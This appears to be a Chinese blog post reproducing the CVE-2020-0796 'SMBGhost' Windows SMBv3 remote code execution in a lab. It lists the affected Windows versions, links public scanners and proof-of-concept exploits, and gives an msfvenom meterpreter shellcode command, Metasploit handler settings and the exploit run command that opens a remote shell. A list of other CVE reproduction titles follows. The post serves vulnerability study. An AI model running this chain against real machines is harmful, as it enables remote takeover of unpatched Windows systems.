2. 程式人生 > 其它 >《永恆之黑》CVE-2020-0796漏洞復現

《永恆之黑》CVE-2020-0796漏洞復現

阿新 發佈:2021-10-26

《永恆之黑》CVE-2020-0796漏洞復現

  • |漏洞簡介

    2020年3月12日,微軟正式釋出CVE-2020-0796高危漏洞補丁,本漏洞源於SMBv3沒有正確處理壓縮的資料包,在解壓資料包的時候使用客戶端傳過來的長度進行解壓時,並沒有檢查長度是否合法,最終導致整數溢位。利用該漏洞,攻擊方可直接遠端攻擊SMB服務端遠端執行任意惡意程式碼,CVE-2020-0796漏洞與“永恆之藍”系列漏洞極為相似,都是利用Windows SMB漏洞遠端攻擊獲取系統最高許可權。

  • |影響版本

    Windows 10 Version 1903 for 32-bit Systems

    Windows 10 Version 1903 for x64-based Systems

    Windows 10 Version 1903 for ARM64-based Systems

    Windows Server, Version 1903 (Server Core installation)

    Windows 10 Version 1909 for 32-bit Systems

    Windows 10 Version 1909 for x64-based Systems

    Windows 10 Version 1909 for ARM64-based Systems

    Windows Server, Version 1909 (Server Core installation)

  • |漏洞復現

    1.環境搭建:

    kali 攻擊機:192.168.87.128

    win10靶機:192.168.87.143

    2.檢視win10靶機版本,win+r,輸入winver

    3.使用SMBGhost工具檢測win靶機是否存在漏洞,工具下載:https://github.com/ollypwn/SMBGhost

    也可以使用藍屏payload,驗證漏洞。藍屏poc下載:https://github.com/chompie1337/SMBGhost_RCE_PoC

    win10出現藍屏,說明存在漏洞

    當然也有其他很多方法,如:

    https://github.com/joaozietolie/CVE-2020-0796-Checker

    http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

    4.利用msfvenom生成的exp反彈shell

    msfvenom -p windows/x64/meterpreter/bind_tcp lport=4444 -b '\x00' -i 1 -f python>exploit

    msf生成的exploit

    替換SMBGhost_RCE_PoC中的exploit.py,並把buf改為USER_PAYLOAD

    5.替換好了,設定msf監聽

    msfconsole //執行msf

    use exploit/multi/handler //開啟監聽模組

    set payload windows/x64/meterpreter/bind_tcp //設定反彈模式

    set rhost 192.168.87.143 //設定目標靶機ip

    set lport 4444 //設定監聽埠

    run //執行

    6.SMBGhost_RCE_PoC執行payload,python3 exploit.py -ip 192.168.87.143,反彈shell

相關推薦

[永恆]CVE-2020-0796漏洞復現

實驗環境:   靶機:windows101903 專業版    攻擊機:kali 2020.3    VMware:vmware14

永恆CVE-2020-0796漏洞復現

永恆之黑CVE-2020-0796漏洞復現 漏洞簡介 2020年3月12日,微軟正式釋出CVE-2020-0796高危漏洞補丁,本漏洞源於SMBv3沒有正確處理壓縮的資料包,在解壓資料包的時候使用客戶端傳過來的長度進行解壓時,並沒有

CVE-2020-2555漏洞復現&&流量分析

CVE-2020-2555漏洞復現&&流量分析 一、準備環境 windows7:weblogic 12.2.1.4.0 JDK版本為jdk-8u261

CVE-2020-2883漏洞復現&&流量分析

CVE-2020-2883漏洞復現&&流量分析 寫在前面 網上大佬說CVE-2020-2883是CVE-2020-2555的繞過,下面就復現了抓包看看吧。

微軟NetLogon許可權提升 CVE-2020-1472 漏洞復現

簡介 NetLogon 遠端協議是一種在 Windows 域控上使用的 RPC 介面,被用於各種與使用者和機器認證相關的任務。最常用於讓使用者使用 NTLM 協議登入伺服器,也用於 NTP 響應認證以及更新計算機域密碼

CVE-2020-1472漏洞復現

摘要 2020年08月12日,Windows官方 釋出了 NetLogon 特權提升漏洞的風險通告,該漏洞編號為 CVE-2020-1472,漏洞等級:嚴重,漏洞評分:10分

Struts2 S2-061(CVE-2020-17530)漏洞復現

0x00 漏洞簡介Apache Struts2框架是一個用於開發Java EE網路應用程式的Web框架。Apache Struts於2020年12月08日披露 S2-061 Struts 遠端程式碼執行漏洞(CVE-2020-17530),在使用某些tag等情況下可能存在OGNL表示式注

Victor CMS 未授權sql注入(CVE-2020-29280)漏洞復現

0X00簡介 The Victor CMS v1.0版本存在安全漏洞,該漏洞源於通過search.php頁面上的“search”引數造成的。

CVE-2020-1938與CVE-2020-13935漏洞復現

前言 最近在騰訊雲上買了個伺服器,準備用來學習。在安裝了7.0.76的tomcat後,騰訊雲提醒我存在兩個漏洞,分別是CVE-2020-1938和CVE-2020-13935,在修復完漏洞後,準備復現一下這兩個漏洞,於是就有了這篇隨筆。

CVE-2020-0796永恆漏洞復現

0x00 漏洞概述 Microsoft Server Message Block 3.1.1(SMBv3)協議在處理某些請求的方式中存在程式碼執行漏洞。攻擊者可以精心構造資料包傳送到SMB伺服器,無需經過身份驗證,即可在目標伺服器上執行任意程式碼。攻

永恆CVE-2020-0796漏洞復現

北京時間3月12日,針對最新披露的SMB遠端程式碼執行漏洞CVE-2020-0796),微軟官方釋出了針對Windows 10/Server禁用SMBv3(SMB 3.1.1版本)協議壓縮的安全指南公告,旨在緩解該漏洞所造成的威脅。隨即,騰訊安全網

Weblogic未授權遠端命令執行漏洞CVE-2020-14882&CVE-2020-14883)復現

Weblogic是Oracle公司推出的J2EE應用伺服器,CVE-2020-14882允許未授權的使用者繞過管理控制檯的許可權驗證訪問後臺,CVE-2020-14883允許後臺任意使用者通過HTTP協議執行任意命令。使用這兩個漏洞組成的利用鏈,可通

weblogic 未授權命令執行漏洞CVE-2020-14882,CVE-2020-14883)復現

漏洞描述 2020年10月29日,360CERT監測發現 Weblogic ConSole HTTP 協議程式碼執行漏洞,該漏洞編號為 CVE-2020-14882,CVE-2020-14883 ,漏洞等級:嚴重,漏洞評分:9.8。遠端攻擊者可以構造特殊的HTTP請求,在未經身

Apache Ofbiz xmlrpc RCE漏洞CVE-2020-9496)復現

Apache Ofbiz xmlrpc RCE漏洞CVE-2020-9496)復現 簡介 Apache OFBiz全稱是The ApacheOpen For Business Project,是開一個放的電子商務平臺,也是一個非常著名的開源專案

Webmin 命令執行漏洞CVE-2020-35606)--- 復現

漏洞繞過針對 採取的措施 CVE-2019-12840 並將其轉換為新向量。 供應商尚未修復此漏洞

Webmin 命令執行漏洞CVE-2020-35606)---復現

CVE-Mitre 連結 下載 webmin_pu_escape_bypass_rce.rb (Metasploit) 漏洞簡介: 該模組利用 Webmin 1.962 及更低版本中的任意命令執行漏洞。 任何授權“包更新”模組的使用者都可以使用 root 許可權執行任意命令。

CVE-2020-5902 簡單復現

這幾天通報了f5的一個漏洞,想著先弄個環境儲存著,說不定後面就用到了。。

【vulhub】Weblogic CVE-2017-10271漏洞復現&&流量分析

Weblogic CVE-2017-10271 漏洞復現&&流量分析 Weblogic CVE-2017-10271 XMLDecoder反序列化

Yii2反序列化(CVE-2020-15148)復現

為了方便安裝,直接在github(https://github.com/yiisoft/yii2)下載一個release的低版本,然後解壓tgz檔案到phpstudy的www的目錄下,命名為Yii2:

CVE-2016-0051漏洞復現

漏洞存在於Microsoft Web 分散式創作和版本管理 (WebDAV)中,如果 Microsoft Web 分散式創作和版本管理 (WebDAV) 客戶端驗證輸入不當,那麼其中就會存在特權提升漏洞。成功利用此漏洞的攻擊者可以使用提升